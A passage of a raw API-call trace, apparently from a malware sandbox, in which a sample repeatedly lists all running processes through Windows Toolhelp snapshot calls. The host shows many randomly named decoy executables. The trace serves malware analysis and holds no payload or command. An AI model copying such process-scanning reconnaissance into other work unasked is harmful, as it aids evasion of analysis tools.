th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.023] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0134.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.099] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.102] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.105] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.116] CloseHandle (hObject=0xc4) returned 1 [0134.116] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.122] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.132] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.182] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.187] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0134.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, 